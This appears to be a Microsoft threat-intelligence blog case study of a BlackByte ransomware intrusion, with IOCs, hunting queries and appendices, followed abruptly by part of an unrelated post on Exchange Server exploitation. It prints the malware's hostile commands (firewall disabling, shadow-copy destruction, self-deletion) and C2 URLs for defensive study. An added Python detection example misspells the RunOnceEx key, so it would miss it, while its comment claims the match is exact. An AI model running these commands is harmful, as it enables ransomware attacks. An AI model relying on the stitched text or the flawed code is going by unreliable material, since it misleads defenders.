After gaining access to a device, the threat actor created the following registry run keys to run a payload each time a user signs in:

Registry key| Value name| Value data
---|---|---
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run| MsEdgeMsE| rundll32 C:\Users\user\Downloads\api-msvc.dll,Default
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run| MsEdgeMsE| rundll32 C:\temp\api-msvc.dll,Default
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run| MsEdgeMsE| rundll32 C:\systemtest\api-system.png,Default

The file `api-msvc.dll` (SHA-256: 4a066569113a569a6feb8f44257ac8764ee8f2011765009fdfd82fe3f4b92d3e) was determined to be a backdoor capable of collecting system information, such as the installed antivirus products, device name, and IP address.
This information is then sent via an HTTP POST request to the following C2 channel:

 * hxxps://myvisit[.]alteksecurity[.]org/t

The organization was not using Microsoft Defender Antivirus, which detects this malware as Trojan:Win32/Kovter!MSR, as the primary antivirus solution, and the backdoor was allowed to run.

An additional file, `api-system.png`, was identified to have similarities to `api-msvc.dll`. This file behaved like a DLL, had the same default export function, and also leveraged run keys for persistence.

**Cobalt Strike Beacon**

The threat actor leveraged Cobalt Strike to achieve persistence. The file `sys.exe` (SHA-256: 5f37b85687780c089607670040dbb3da2749b91b8adc0aa411fd6280b5fa7103), detected by Microsoft Defender Antivirus as Trojan:Win64/CobaltStrike!MSR, was determined to be a Cobalt Strike Beacon and was downloaded directly from the file sharing service temp[.]sh:

 * hxxps://temp[.]sh/szAyn/sys.exe

This beacon was configured to communicate with the following C2 channel:

 * 109.206.243[.]59:443

**AnyDesk**

Threat actors leverage legitimate remote access tools during intrusions to blend into a victim network. In this case, the threat actor utilized the remote administration tool AnyDesk to maintain persistence and move laterally within the network.
AnyDesk was installed as a service and was run from the following paths:

 * `C:\systemtest\anydesk\AnyDesk.exe`
 * `C:\Program Files (x86)\AnyDesk\AnyDesk.exe`
 * `C:\Scripts\AnyDesk.exe`

Successful connections were observed in the AnyDesk log file `ad_svc.trace` involving anonymizer service IP addresses linked to TOR and MULLVAD VPN, a common technique that threat actors employ to obscure their source IP ranges.

### Reconnaissance

We found the presence and execution of the network discovery tool NetScan being used by the threat actor to perform network enumeration using the following file names:

 * `netscan.exe` (SHA-256: 1b9badb1c646a19cdf101ac4f6fdd23bc61eaab8c9f925eb41848cea9fd0738e)
 * `netapp.exe` (SHA-256: 1b9badb1c646a19cdf101ac4f6fdd23bc61eaab8c9f925eb41848cea9fd0738e)

Additionally, execution of AdFind (SHA-256: f157090fd3ccd4220298c06ce8734361b724d80459592b10ac632acc624f455e), an Active Directory reconnaissance tool, was observed in the environment.

### Credential access

Evidence of likely usage of the credential theft tool Mimikatz was also uncovered through the presence of a related log file `mimikatz.log`. Microsoft IR assesses that Mimikatz was likely used to attain credentials for privileged accounts.

### Lateral movement

Using compromised domain admin credentials, the threat actor used Remote Desktop Protocol (RDP) and PowerShell remoting to obtain access to other servers in the environment, including domain controllers.

### Data staging and exfiltration

On one server where Microsoft Defender Antivirus was installed, a suspicious file named `explorer.exe` was identified, detected as Trojan:Win64/WinGoObfusc.LK!MT, and quarantined.
However, because tamper protection wasn’t enabled on this server, the threat actor was able to disable the Microsoft Defender Antivirus service, enabling the threat actor to run the file using the following command:

    explorer.exe P@$$w0rd

After reverse engineering `explorer.exe`, we determined it to be ExByte, a Go-based tool developed and commonly used in BlackByte ransomware attacks for collection and exfiltration of files from victim networks. This tool is capable of enumerating files of interest across the network and, upon execution, creates a log file containing a list of files and associated metadata. Multiple log files were uncovered during the investigation in the path:

 * `C:\Exchange\MSExchLog.log`

Analysis of the binary revealed a list of file extensions that are targeted for enumeration.

Figure 2. Binary analysis showing file extensions enumerated by explorer.exe

Forensic analysis identified a file named `data.txt` that was created and later deleted after ExByte execution. This file contained obfuscated credentials that ExByte leveraged to authenticate to the popular file sharing platform Mega NZ using the platform’s API at:

 * hxxps://g.api.mega.co[.]nz

Figure 3. 
Binary analysis showing explorer.exe functionality for connecting to file sharing service MEGA NZ

We also determined that this version of ExByte was crafted specifically for the victim, as it contained a hardcoded device name belonging to the victim and an internal IP address.

**ExByte execution flow**

Upon execution, ExByte decodes several strings and checks if the process is running with privileged access by reading `\\.\PHYSICALDRIVE0`:

 * If this check fails, `ShellExecuteW` is invoked with the `lpOperation` parameter `RunAs`, which runs `explorer.exe` with elevated privileges.

After this access check, `explorer.exe` attempts to read the `data.txt` file in the current location:

 * If the text file doesn’t exist, it invokes a command for self-deletion and exits from memory:

        C:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 10 > nul & Del <PATH>\explorer.exe /F /Q

 * If `data.txt` exists, `explorer.exe` reads the file, passes the buffer to a Base64 decode function, and then decrypts the data using the key provided in the command line. The decrypted data is then parsed as the JSON below and fed to the login function:

        {
            "a": "us0",
            "user": "<CONTENT FROM data.txt>"
        }

Finally, it forms a URL for sign-in to the API of the service MEGA NZ:

 * hxxps://g.api.mega.co[.]nz/cs?id=1674017543

### Data encryption and destruction

On devices where files were successfully encrypted, we identified suspicious executables, detected by Microsoft Defender Antivirus as Trojan:Win64/BlackByte!MSR, with the following names:

 * `wEFT.exe`
 * `schillerized.exe`

The files were analyzed and determined to be BlackByte 2.0 binaries responsible for encryption across the environment.
The binaries require an 8-digit key number to encrypt files.

Two modes of execution were identified:

 * When the `-s` parameter is provided, the ransomware self-deletes and encrypts the machine it was executed on.
 * When the `-a` parameter is provided, the ransomware conducts enumeration and uses a UPX (Ultimate Packer for eXecutables) packed version of PsExec to deploy across the network. Several domain admin credentials were hardcoded in the binary, facilitating the deployment of the binary across the network.

Depending on the switch (`-s` or `-a`), execution may create the following files:

 * `C:\SystemData\M8yl89s7.exe` (UPX-packed PsExec with a random name; SHA-256: ba3ec3f445683d0d0407157fda0c26fd669c0b8cc03f21770285a20b3133098f)
 * `C:\SystemData\wEFT.exe` (additional BlackByte binary)
 * `C:\SystemData\MsExchangeLog1.log` (log file)
 * `C:\SystemData\rENEgOtiAtES` (a vulnerable (CVE-2019-16098) driver, `RtCore64.sys`, used to evade detection by installed antivirus software; SHA-256: 01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd)
 * `C:\SystemData\iHu6c4.ico` (random name; BlackByte icon)
 * `C:\SystemData\BB_Readme_file.txt` (BlackByte ReadMe file)
 * `C:\SystemData\skip_bypass.txt` (unknown)

**BlackByte 2.0 ransomware capabilities**

Some capabilities identified for the BlackByte 2.0 ransomware were:

 * Antivirus bypass
   * The file `rENEgOtiAtES` created matches `RTCore64.sys`, a vulnerable driver (CVE-2019-16098) that allows any authenticated user to read or write to arbitrary memory
   * The BlackByte binary then creates and starts a service named `RABAsSaa` calling `rENEgOtiAtES`, and exploits this service to evade detection by installed antivirus software
 * Process hollowing
   * Invokes `svchost.exe`, injects into it to complete device encryption, and self-deletes by executing the following command:
     * `cmd.exe /c ping 1.1.1.1 -n 10 > Nul & Del "PATH_TO_BLACKBYTE" /F /Q`
 * Modification / disabling of Windows Firewall
   * The following commands are executed to either modify existing Windows Firewall rules, or to disable Windows Firewall entirely:
     * `cmd /c netsh advfirewall set allprofiles state off`
     * `cmd /c netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes`
     * `cmd /c netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes`
 * Modification of volume shadow copies
   * The following commands are executed to destroy volume shadow copies on the machine:
     * `cmd /c vssadmin Resize ShadowStorge /For=B:\ /On=B:\ /MaxSize=401MB`
     * `cmd /c vssadmin Resize ShadowStorage /For=B:\ /On=B:\ /MaxSize=UNBOUNDED`
 * Modification of registry keys/values
   * The following commands are executed to modify the registry, facilitating elevated execution on the device:
     * `cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f`
     * `cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f`
     * `cmd /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f`
 * Additional functionality
   * Ability to terminate running services and processes
   * Ability to enumerate and mount volumes and network shares for encryption
   * Performs the anti-forensics technique of timestomping (sets the file time of encrypted files and the ReadMe file to 2000-01-01 00:00:00)
   * Ability to perform anti-debugging techniques

## Recommendations

To guard against BlackByte ransomware attacks, Microsoft recommends the following:

 * Ensure that you have a patch management process in place and that patching for internet-exposed devices is prioritized. Understand and assess your cyber exposure with advanced vulnerability and configuration assessment tools like [Microsoft Defender Vulnerability Management](<https://learn.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management?view=o365-worldwide>)
 * Implement an endpoint detection and response (EDR) solution like [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint>) to gain visibility into malicious activity in real time across your network
 * Ensure antivirus protections are updated regularly by [turning on cloud-based protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) and that your antivirus solution is configured to block threats
 * Enable [tamper protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) to prevent components of Microsoft Defender Antivirus from being disabled
 * Block inbound traffic from IPs specified in the indicators of compromise section of this report
 * Block inbound traffic from TOR exit nodes
 * Block inbound access from unauthorized public VPN services
 * Restrict administrative privileges to prevent unauthorized system changes

## Conclusion

BlackByte ransomware attacks target organizations that have infrastructure with unpatched vulnerabilities. As outlined in the [Microsoft Digital Defense Report](<https://www.microsoft.com/security/business/microsoft-digital-defense-report-2022>), common security hygiene practices, including keeping systems up to date, could protect against 98% of attacks.

As new tools are being developed by threat actors, a modern threat protection solution like Microsoft 365 Defender is necessary to prevent and detect the multiple techniques used in the attack chain, especially where the threat actor attempts to evade or disable specific defense mechanisms.
Hunting for malicious behavior should be performed regularly in order to detect potential attacks that could evade detections, as a complementary activity to continuous monitoring of security tool alerts and incidents.

To understand how Microsoft can help you secure your network and respond to network compromise, visit <https://aka.ms/MicrosoftIR>.

## Microsoft 365 Defender detections

**Microsoft Defender Antivirus**

Microsoft Defender Antivirus detects this threat as the following malware:

 * Trojan:Win32/Kovter!MSR
 * Trojan:Win64/WinGoObfusc.LK!MT
 * Trojan:Win64/BlackByte!MSR
 * HackTool:Win32/AdFind!MSR
 * Trojan:Win64/CobaltStrike!MSR

**Microsoft Defender for Endpoint**

The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.

 * 'CVE-2021-31207' exploit malware was detected
 * An active 'NetShDisableFireWall' malware in a command line was prevented from executing
 * Suspicious registry modification
 * 'Rtcore64' hacktool was detected
 * Possible ongoing hands-on-keyboard activity (Cobalt Strike)
 * A file or network connection related to a ransomware-linked emerging threat activity group detected
 * Suspicious sequence of exploration activities
 * A process was injected with potentially malicious code
 * Suspicious behavior by cmd.exe was observed
 * 'Blackbyte' ransomware was detected

**Microsoft Defender Vulnerability Management**

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

 * CVE-2021-34473
 * CVE-2021-34523
 * CVE-2021-31207
 * CVE-2019-16098

## Hunting queries

**Microsoft 365 Defender**

Microsoft 365 Defender customers can run the following queries to find related activity in their networks:

**ProxyShell web shell creation events**

    DeviceProcessEvents
    | where ProcessCommandLine has_any ("ExcludeDumpster","New-ExchangeCertificate") and ProcessCommandLine has_any ("-RequestFile","-FilePath")

**Suspicious vssadmin events**

    DeviceProcessEvents
    | where ProcessCommandLine has_any ("vssadmin","vssadmin.exe") and ProcessCommandLine has "Resize ShadowStorage" and ProcessCommandLine has_any ("MaxSize=401MB","MaxSize=UNBOUNDED")

**Detection for persistence creation using Registry Run keys**

    DeviceRegistryEvents
    | where ActionType == "RegistryValueSet"
    | where (RegistryKey has @"Microsoft\Windows\CurrentVersion\RunOnce" and RegistryValueName == "MsEdgeMsE")
        or (RegistryKey has @"Microsoft\Windows\CurrentVersion\RunOnceEx" and RegistryValueName == "MsEdgeMsE")
        or (RegistryKey has @"Microsoft\Windows\CurrentVersion\Run" and RegistryValueName == "MsEdgeMsE")
    | where RegistryValueData startswith @"rundll32"
    | where RegistryValueData endswith @".dll,Default"
    | project Timestamp,DeviceId,DeviceName,ActionType,RegistryKey,RegistryValueName,RegistryValueData

**Microsoft Sentinel**

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
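The three Microsoft 365 Defender hunting queries above, re-expressed as an added Python example (not Microsoft's code) over constructed process and registry event records, so the matching logic can be read and checked offline. KQL `has` is term-based; the example approximates it with case-insensitive substring matching except for the Run-key test, where it compares the key's last path component, which is exactly why the query lists Run, RunOnce and RunOnceEx separately. The field names follow the advanced hunting columns the queries use; the records and timestamps are made up.

```python
r"""Added example (not Microsoft's code): the three Microsoft 365 Defender
hunting queries above, re-expressed in Python over constructed process and
registry event records.  Field names follow the advanced hunting columns the
queries use; the records and timestamps are made up."""


def _has_any(text, terms):
    """Approximation of KQL has_any: case-insensitive substring match.
    KQL 'has' is term-based, so this version is slightly noisier, never blinder."""
    low = text.lower()
    return any(term.lower() in low for term in terms)


def is_proxyshell_webshell_creation(cmdline):
    """Query 1: mailbox export / certificate requests carrying a file path,
    the pattern the post ties to ProxyShell web shell creation."""
    return (_has_any(cmdline, ("ExcludeDumpster", "New-ExchangeCertificate"))
            and _has_any(cmdline, ("-RequestFile", "-FilePath")))


def is_suspicious_vssadmin(cmdline):
    """Query 2: the two ShadowStorage resizes BlackByte issues to purge shadow copies."""
    return (_has_any(cmdline, ("vssadmin", "vssadmin.exe"))
            and _has_any(cmdline, ("Resize ShadowStorage",))
            and _has_any(cmdline, ("MaxSize=401MB", "MaxSize=UNBOUNDED")))


# Query 3 names Run, RunOnce and RunOnceEx separately because KQL 'has' is
# term-based; matching the key's last component reproduces that exactly.
_RUN_KEYS = tuple("microsoft\\windows\\currentversion\\" + k
                  for k in ("run", "runonce", "runoncex"))


def is_run_key_persistence(event):
    """Query 3: value MsEdgeMsE under a Run key, pointing rundll32 at a DLL's Default export."""
    if event.get("ActionType") != "RegistryValueSet":
        return False
    key = event.get("RegistryKey", "").lower().rstrip("\\")
    if not key.endswith(_RUN_KEYS):
        return False
    if event.get("RegistryValueName") != "MsEdgeMsE":   # KQL == is case-sensitive
        return False
    data = event.get("RegistryValueData", "").lower()    # startswith/endswith are not
    return data.startswith("rundll32") and data.endswith(".dll,default")


def hunt(process_events, registry_events):
    """Return, per query, the Timestamps of the records that matched."""
    return {
        "proxyshell_webshell": [e["Timestamp"] for e in process_events
                                if is_proxyshell_webshell_creation(e["ProcessCommandLine"])],
        "vssadmin": [e["Timestamp"] for e in process_events
                     if is_suspicious_vssadmin(e["ProcessCommandLine"])],
        "run_key": [e["Timestamp"] for e in registry_events
                    if is_run_key_persistence(e)],
    }


# Constructed sample records (not real telemetry).
PROCESS_EVENTS = [
    {"Timestamp": "2023-05-01T02:10:00Z", "DeviceName": "ex01",
     "ProcessCommandLine": r'powershell -c "New-MailboxExportRequest -Mailbox user1 -ExcludeDumpster -FilePath \\ex01\c$\temp\u1.pst"'},
    {"Timestamp": "2023-05-01T02:11:00Z", "DeviceName": "ex01",   # ordinary export, no ExcludeDumpster
     "ProcessCommandLine": r'powershell -c "New-MailboxExportRequest -Mailbox user2 -FilePath \\files\exports\u2.pst"'},
    {"Timestamp": "2023-05-01T03:00:00Z", "DeviceName": "srv02",
     "ProcessCommandLine": r"cmd /c vssadmin Resize ShadowStorage /For=C:\ /On=C:\ /MaxSize=401MB"},
    {"Timestamp": "2023-05-01T03:00:05Z", "DeviceName": "srv02",
     "ProcessCommandLine": "vssadmin list shadows"},
]

_RUN = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
REGISTRY_EVENTS = [
    {"Timestamp": "2023-05-01T02:30:00Z", "ActionType": "RegistryValueSet", "RegistryKey": _RUN,
     "RegistryValueName": "MsEdgeMsE", "RegistryValueData": r"rundll32 C:\temp\api-msvc.dll,Default"},
    {"Timestamp": "2023-05-01T02:31:00Z", "ActionType": "RegistryValueSet", "RegistryKey": _RUN,
     "RegistryValueName": "MsEdgeMsE", "RegistryValueData": r"rundll32 C:\systemtest\api-system.png,Default"},
    {"Timestamp": "2023-05-01T02:32:00Z", "ActionType": "RegistryValueSet", "RegistryKey": _RUN,
     "RegistryValueName": "OneDrive", "RegistryValueData": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]

if __name__ == "__main__":
    for query, matched in hunt(PROCESS_EVENTS, REGISTRY_EVENTS).items():
        print(f"{query}: {matched}")
```

The registry check keeps the query's `.dll,Default` suffix test, so the `api-system.png,Default` value from the persistence table earlier in this post does not match it even though the value name is the same; hunting on the `MsEdgeMsE` value name alone, as that table suggests, is the broader check. Likewise the first query only fires on exports that carry `ExcludeDumpster` or on certificate requests, which is why the second constructed command line, an ordinary mailbox export, is not reported.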
More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>

Microsoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post-exploitation activity detailed in this blog, in addition to the Microsoft 365 Defender detections listed above.

 * [ProxyShell](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Detections/W3CIISLog/ProxyShellPwn2Own.yaml>)
 * [Web shell activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Web%20Shells%20Threat%20Protection/Hunting%20Queries/WebShellActivity.yaml>)
 * [Suspicious file downloads on Exchange Servers](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Detections/http_proxy_oab_CL/ExchagngeSuspiciousFileDownloads.yaml>)
 * [Firewall rule changes](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Hunting%20Queries/MultipleDataSources/FirewallRuleChanges_using_netsh.yaml>)
 * [Shadow copy deletion](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/ShadowCopyDeletion.yml>)
 * [Anomalous RDP activity](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Solutions/UEBA%20Essentials/Hunting%20Queries/Anomalous%20RDP%20Activity.yaml>)

## Indicators of compromise

The table below shows IOCs observed during our investigation.
We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.

Indicator| Type| Description
---|---|---
4a066569113a569a6feb8f44257ac8764ee8f2011765009fdfd82fe3f4b92d3e| SHA-256| api-msvc.dll (backdoor installed through Run keys)
5f37b85687780c089607670040dbb3da2749b91b8adc0aa411fd6280b5fa7103| SHA-256| sys.exe (Cobalt Strike Beacon)
01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd| SHA-256| rENEgOtiAtES (vulnerable driver RtCore64.sys created by BlackByte binary)
ba3ec3f445683d0d0407157fda0c26fd669c0b8cc03f21770285a20b3133098f| SHA-256| [RANDOM_NAME].exe (UPX-packed PsExec created by BlackByte binary)
1b9badb1c646a19cdf101ac4f6fdd23bc61eaab8c9f925eb41848cea9fd0738e| SHA-256| "netscan.exe", "netapp.exe" (Netscan network discovery tool)
f157090fd3ccd4220298c06ce8734361b724d80459592b10ac632acc624f455e| SHA-256| AdFind.exe (Active Directory information gathering tool)
hxxps://myvisit[.]alteksecurity[.]org/t| URL| C2 for backdoor api-msvc.dll
hxxps://temp[.]sh/szAyn/sys.exe| URL| Download URL for sys.exe
109.206.243[.]59| IP Address| C2 for Cobalt Strike Beacon sys.exe
185.225.73[.]244| IP Address| Originating IP address for ProxyShell exploitation and web shell interaction

**NOTE:** These indicators should not be considered exhaustive for this observed activity.

## Appendix

File extensions targeted by the BlackByte binary for encryption:

.4dd| .4dl| .accdb| .accdc| .accde| .accdr| .accdt| .accft
---|---|---|---|---|---|---|---
.adb| .ade| .adf| .adp| .arc| .ora| .alf| .ask
.btr| .bdf| .cat| .cdb| .ckp| .cma| .cpd| .dacpac
.dad| .dadiagrams| .daschema| .db| .db-shm| .db-wal| .db3| .dbc
.dbf| .dbs| .dbt| .dbv| .dbx| .dcb| .dct| .dcx
.ddl| .dlis| .dp1| .dqy| .dsk| .dsn| .dtsx| .dxl
.eco| .ecx| .edb| .epim| .exb| .fcd| .fdb| .fic
.fmp| .fmp12| .fmpsl| .fol| .fp3| .fp4| .fp5| .fp7
.fpt| .frm| .gdb| .grdb| .gwi| .hdb| .his| .ib
.idb| .ihx| .itdb| .itw| .jet| .jtx| .kdb| .kexi
.kexic| .kexis| .lgc| .lwx| .maf| .maq| .mar| .masmav
.mdb| .mpd| .mrg| .mud| .mwb| .myd| .ndf| .nnt
.nrmlib| .ns2| .ns3| .ns4| .nsf| .nv| .nv2| .nwdb
.nyf| .odb| .ogy| .orx| .owc| .p96| .p97| .pan
.pdb| .pdm| .pnz| .qry| .qvd| .rbf| .rctd| .rod
.rodx| .rpd| .rsd| .sas7bdat| .sbf| .scx| .sdb| .sdc
.sdf| .sis| .spg| .sql| .sqlite| .sqlite3| .sqlitedb| .te
.temx| .tmd| .tps| .trc| .trm| .udb| .udl| .usr
.v12| .vis| .vpd| .vvv| .wdb| .wmdb| .wrk| .xdb
.xld| .xmlff| .abcddb| .abs| .abx| .accdw| .and| .db2
.fm5| .hjt| .icg| .icr| .kdb| .lut| .maw| .mdn
.mdt| | | | | | |

Shared folders targeted for encryption (example: _\\\\[IP address]\Downloads_):

Users| Backup| Veeam| homes| home
---|---|---|---|---
media| common| Storage Server| Public| Web
Images| Downloads| BackupData| ActiveBackupForBusiness| Backups
NAS-DC| DCBACKUP| DirectorFiles| share|

File extensions ignored:

.ini| .url| .msilog| .log| .ldf| .lock| .theme| .msi
---|---|---|---|---|---|---|---
.sys| .wpx| .cpl| .adv| .msc| .scr| .key| .ico
.dll| .hta| .deskthemepack| .nomedia| .msu| .rtp| .msp| .idx
.ani| .386| .diagcfg| .bin| .mod| .ics| .com| .hlp
.spl| .nls| .cab| .exe| .diagpkg| .icl| .ocx| .rom
.prf| .thempack| .msstyles| .icns| .mpa| .drv| .cur| .diagcab
.cmd| .shs| | | | | |

Folders ignored:

windows| boot| program files (x86)| windows.old| programdata
---|---|---|---|---
intel| bitdefender| trend micro| windowsapps| appdata
application data| system volume information| perflogs| msocache|

Files ignored:

bootnxt| ntldr| bootmgr| thumbs.db
---|---|---|---
ntuser.dat| bootsect.bak| autoexec.bat| iconcache.db
bootfont.bin| | |

Processes terminated:

teracopy| teamviewer| nsservice| nsctrl| uranium
---|---|---|---|---
processhacker| procmon| pestudio| procmon64| x32dbg
x64dbg| cff explorer| procexp| pslist| tcpview
tcpvcon| dbgview| rammap| rammap64| vmmap
ollydbg| autoruns| autorunssc| filemon| regmon
idaq| idaq64| immunitydebugger| wireshark| dumpcap
hookexplorer| importrec| petools| lordpe| sysinspector
proc_analyzer| sysanalyzer| sniff_hit| windbg| joeboxcontrol
joeboxserver| resourcehacker| fiddler| httpdebugger| dumpit
rammap| rammap64| vmmap| agntsvc| cntaosmgr
dbeng50| dbsnmp| encsvc| infopath| isqlplussvc
mbamtray| msaccess| msftesql| mspub| mydesktopqos
mydesktopservice| mysqld| mysqld-nt| mysqld-opt| Ntrtscan
ocautoupds| ocomm| ocssd| onenote| oracle
outlook| PccNTMon| powerpnt| sqbcoreservice| sql
sqlagent| sqlbrowser| sqlservr| sqlwriter| steam
synctime| tbirdconfig| thebat| thebat64| thunderbird
tmlisten| visio| winword| wordpad| xfssvccon
zoolz| | | |

Services terminated:

CybereasonRansomFree| vnetd| bpcd| SamSs| TeraCopyService
---|---|---|---|---
msftesql| nsService| klvssbridge64| vapiendpoint| ShMonitor
Smcinst| SmcService| SntpService| svcGenericHost| Swi_
TmCCSF| tmlisten| TrueKey| TrueKeyScheduler| TrueKeyServiceHelper
WRSVC| McTaskManager| OracleClientCache80| mfefire| wbengine
mfemms| RESvc| mfevtp| sacsvr| SAVAdminService
SepMasterService| PDVFSService| ESHASRV| SDRSVC| FA_Scheduler
KAVFS| KAVFS_KAVFSGT| kavfsslp| klnagent| macmnsvc
masvc| MBAMService| MBEndpointAgent| McShield| audioendpointbuilder
Antivirus| AVP| DCAgent| bedbg| EhttpSrv
MMS| ekrn| EPSecurityService| EPUpdateService| ntrtscan
EsgShKernel| msexchangeadtopology| AcrSch2Svc| MSOLAP$TPSAMA| Intel(R) PROSet Monitoring
msexchangeimap4| ARSM| unistoresvc_1af40a| ReportServer$TPS| MSOLAP$SYSTEM_BGC
W3Svc| MSExchangeSRS| ReportServer$TPSAMA| Zoolz 2 Service| MSOLAP$TPS
aphidmonitorservice| SstpSvc| MSExchangeMTA| ReportServer$SYSTEM_BGC| Symantec System Recovery
UI0Detect| MSExchangeSA| MSExchangeIS| ReportServer| MsDtsServer110
POP3Svc| MSExchangeMGMT| SMTPSvc| MsDtsServer| IisAdmin
MSExchangeES| EraserSvc11710| Enterprise Client Service| MsDtsServer100| NetMsmqActivator
stc_raw_agent| VSNAPVSS| PDVFSService| AcrSch2Svc| Acronis
CASAD2DWebSvc| CAARCUpdateSvc| McAfee| avpsus| DLPAgentService
mfewc| BMR Boot Service| DefWatch| ccEvtMgr| ccSetMgr
SavRoam| RTVsc screenconnect| ransom| sqltelemetry| msexch
vnc| teamviewer| msolap| veeam| backup
sql| memtas| vss| sophos| svc$
mepocs| wuauserv| | |

Drivers that BlackByte can bypass:
## Further reading

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <https://aka.ms/threatintelblog>.

To get notified about new publications and to join discussions on social media, follow us on Twitter at <https://twitter.com/MsftSecIntel>.

The post [The five-day job: A BlackByte ransomware intrusion case study](<https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).

Microsoft continues to monitor and investigate attacks exploiting the recent on-premises Exchange Server vulnerabilities. These attacks are now performed by multiple threat actors ranging from financially motivated cybercriminals to state-sponsored groups. To help customers who are not able to immediately install updates, Microsoft [released a one-click tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) that automatically mitigates one of the vulnerabilities and scans servers for known attacks. Microsoft also [built this capability into Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>), expanding the reach of the mitigation. As of today, we have seen a significant decrease in the number of still-vulnerable servers – more than 92% of known worldwide Exchange IPs are now patched or mitigated. We continue to work with our customers and partners to mitigate the vulnerabilities.

As organizations recover from this incident, we continue to publish guidance and share threat intelligence to help detect and evict threat actors from affected environments. Today, we are sharing intelligence about what some attackers did after exploiting the vulnerable servers, ranging from ransomware to data exfiltration and deployment of various second-stage payloads.
This blog covers:

 * Threat intelligence and technical details about known attacks, including components and attack paths, that defenders can use to investigate whether on-premises Exchange servers were compromised before they were patched and to comprehensively respond to and remediate these threats if they see them in their environments.
 * Detection and automatic remediation built into Microsoft Defender Antivirus, and how investigation and remediation capabilities in solutions like Microsoft Defender for Endpoint can help responders perform additional hunting and remediate threats.

Although the overall number of ransomware incidents has remained extremely small to this point, it is important to remember that these threats show how quickly attackers can pivot their campaigns to take advantage of newly disclosed vulnerabilities and target unpatched systems, demonstrating how critical it is for organizations to apply security updates as soon as possible. We strongly urge organizations to identify and update vulnerable on-premises Exchange servers, and to follow the mitigation and investigation guidance that we have collected and continue to update here: <https://aka.ms/ExchangeVulns>.

## Mitigating post-exploitation activities

The first known attacks leveraging the Exchange Server vulnerabilities were by the nation-state actor HAFNIUM, which we detailed in [this blog](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). In the three weeks after the Exchange Server vulnerabilities were disclosed and the security updates were released, Microsoft saw numerous other attackers adopting the exploit into their toolkits. Attackers are known to rapidly work to reverse engineer patches and develop exploits.
In the case of a remote code execution (RCE) vulnerability, the rewards are high for attackers who can gain access before an organization patches, as patching a system does not necessarily remove the access of the attacker.

_Figure 1. The Exchange Server exploit chain_

In our investigation of the on-premises Exchange Server attacks, we saw systems being affected by multiple threats. **Many of the compromised systems have not yet received a secondary action**, such as human-operated ransomware attacks or data exfiltration, indicating attackers could be establishing and keeping their access for potential later actions. These actions might involve performing follow-on attacks via persistence on Exchange servers they have already compromised, or using credentials and data stolen during these attacks to compromise networks through other entry vectors.

Attackers who included the exploit in their toolkits, whether through modifying public proof of concept exploits or their own research, capitalized on their window of opportunity to gain access to as many systems as they could. Some attackers were advanced enough to remove other attackers from the systems and use multiple persistence points to maintain access to a network.

We have built protections against these threats into Microsoft security solutions. Refer to the Appendix for a list of indicators of compromise, detection details, and advanced hunting queries. We have also provided additional tools and investigation and remediation guidance here: <https://aka.ms/exchange-customer-guidance>.

While performing a full investigation on systems is recommended, the following themes are common in many of the attacks. These are prevailing threat trends that Microsoft has been monitoring, and existing solutions and recommendations for prevention and mitigation apply:

